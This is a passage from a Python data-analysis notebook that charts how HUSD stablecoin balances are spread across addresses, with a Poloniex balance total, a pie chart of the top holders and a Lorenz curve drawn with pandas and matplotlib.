for i in df[0]: val = balance['balance'][balance['address'] == i] if not val.empty: bal += balance['balance'][balance['address'] == i].values[0] else: pass print('Poloniex Total Balance: {:.0f}\n{:.2f}% of Total'.format(bal, bal/balance.loc[balance.index[-1], 'cum']*100)) # <center></center> # <center></center> # <center></center> # # II. IV. Pie Chart # + df = pd.read_csv(positive_cumulated_balances, index_col='Unnamed: 0') aa = df.iloc[df.index[-1]-80:] bb = df['balance'].iloc[:df.index[-1]-80] df = aa.append(pd.DataFrame({'address': 'others', 'balance': sum(bb)}, index=[0])) label = [] counter = 0 def getlabel(i): global counter if i: if not i == 'others': label.append(i + '...') else: label.append(i) else: label.append('') counter += 1 [getlabel(i[:6]) if counter >= len(df)-5 else getlabel('') for i in df['address'] ] print() # + print('\n\n') # Colorspace colors by: https://colorspace.r-forge.r-project.org/index.html colorspace_set3 = ['#EEBD92','#FFB3B5','#85D0F2','#BCC3FE','#E7B5F5', '#FEAFDA', '#61D8D6','#76D9B1','#A4D390','#CFC982'] colorsp_dynamic =['#DB9D85', '#87AEDF', '#9DB469', '#6DBC86', '#3DBEAB', '#4CB9CC', '#C2A968', '#BB9FE0', '#DA95CC', '#E494AB'] colorspa_dark_3 = ['#B675E0','#5991E4','#00AA5A','#6F9F00','#CE7D3B'] colorspa_dyna_5 = ['#9DB469','#87AEDF','#DA95CC', '#DB9D85','#3DBEAB'] fig = plt.figure(figsize=(25,15), dpi=400) ax = fig.add_subplot() aa = plt.pie(df['balance'],colors=colorsp_dynamic, labels=label, autopct=lambda x: r'{:.1f}\%'.format(x) if x > 1.5 else r'{:.0f}\%'.format(x) if x > 5 else '', pctdistance= 0.8, labeldistance= 1.05, radius=1, explode=[0.01 for i in range(0, len(df['balance']))], wedgeprops = {'linewidth': 0.8, 'edgecolor':'k'}, startangle=0) # Custom Modifications #aa[-1][-1].set_x(-0.7268917458682129) aa[-1][-1].set_fontsize(35) aa[-1][-2].set_fontsize(40) #aa[-1][-2].set_x(0.19977073082370535) #aa[-1][-2].set_y(0.8000006952023211) aa[-1][-3].set_fontsize(27) aa[-1][-4].set_fontsize(23) aa[-1][-5].set_fontsize(20) aa[-1][-6].set_fontsize(16) aa[-1][-7].set_fontsize(13) aa[-1][-8].set_fontsize(9) aa[-1][-9].set_fontsize(9) aa[-1][-10].set_fontsize(9) aa[-1][-11].set_fontsize(8) fontsize = -43 for i in aa[1]: i.set_fontsize(fontsize) fontsize += 1 aa[1][-1].set_fontsize(55) aa[1][-3].set_y(0.24526206965343738) aa[1][-4].set_y(0.16709989305583238) aa[1][-5].set_y(0.0989980411375326) plt.tight_layout(pad=5) plt.title('H U S D \ \ D i s t r i b u t i o n', fontsize = 50) circ = plt.Circle((0,0),0.5,color='black', fc='white',linewidth=1.25) ax.add_artist(circ) plt.savefig('../pics/husd/husd_distribution_pie.pdf') # - # ## II.V. Lorenz curve df = pd.read_csv(positive_cumulated_balances, index_col = 'Unnamed: 0') df # + y_all = df['cum']/df['cum'].iloc[-1] x_all = (np.arange(start = 0 , stop = len(df['cum']), step = 1)/(len(df['cum']))) y_25_75 = df['cum'].iloc[int(df.index[-1]*0.25):int(df.index[-1]*0.75)] y_25_75 = y_25_75/max(y_25_75) x_25_75 = np.arange(start = 0 , stop = len(y_25_75), step = 1)/(len(y_25_75)) # - print('Q3-Q1 (in husd):') df['balance'].iloc[int(df.index[-1]*0.25):int(df.index[-1]*0.75)].describe().apply(lambda x: format(x/(10**0), 'f')) print('\n\n') fig = plt.figure(figsize=(15,15)) ax = fig.add_subplot() plt.grid() plt.title(r'L o r e n z \ \ C u r v e'+'\n', fontsize=50) plt.xlabel('\n'+r'\% \ \ of \ \ A d d r e s s e s', fontsize=30) plt.ylabel(r'\% \ o f \ \ t o t a l \ \ H U S D \ \ s u p p l y'+'\n', fontsize=30) plt.xticks(fontsize=20) plt.yticks(fontsize=20) ax.plot(x_all,y_all, linewidth = 5, color = '#2D728F', label = r'$\ All$') ax.plot(x_25_75,y_25_75, linewidth = 5, color = '#87AEDF', label = r'$\ Q_3 - Q_1$') plt.legend(fontsize= 35) plt.plot([0, 1], [0, 1], transform=ax.transAxes, linewidth = 4, ls = (0, (5, 10)), color = 'black') ax.set_xlim([0,1.05]) plt.savefig('../pics/husd/husd_lorenzcurve.pdf')
individual_token_analysis/husd_descriptive_analysis.ipynb